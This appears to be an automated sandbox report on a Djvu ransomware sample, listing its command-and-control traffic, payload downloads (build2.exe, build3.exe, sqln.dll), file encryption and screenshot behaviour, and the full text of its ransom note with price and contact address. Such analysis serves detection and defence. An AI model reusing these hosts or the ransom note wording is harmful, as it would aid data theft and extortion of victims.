00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.139.220 172.67.139.220
Source: Joe Sandbox View	IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View	IP Address: 186.13.17.220 186.13.17.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: TechtelLMDSComunicacionesInteractivasSAAR TechtelLMDSComunicacionesInteractivasSAAR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGIIDHJEBGIDHJJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 5909Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 829Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe.K5.(
Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe0K
Source: R5391762lf.exe, 00000007.00000003.1489131073.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: R5391762lf.exe, 00000007.00000003.1484310948.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: R5391762lf.exe, 00000007.00000003.1484368248.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/eQ
Source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonn
Source: R5391762lf.exe, 00000007.00000003.1490848962.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/generate_204
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/react-native-community/react-native-netinfo
Source: R5391762lf.exe, 00000007.00000003.1488893485.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Jump to dropped file

Yara detected Djvu Ransomware

Source: Yara match	File source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File deleted: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File deleted: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\GRXZDKKVDB.mp3

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d898effa-5251-49be-909e-6a34c1643269}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7c	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fa4f3cd-f899-4abc-9ee3-31954eeeae00}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\jones\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg entropy: 7.9972815415	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{09d41dfb-343c-4c64-80de-0d8ebc18a6b9}\Apps.ft entropy: 7.99606416018	Jump to dropped file
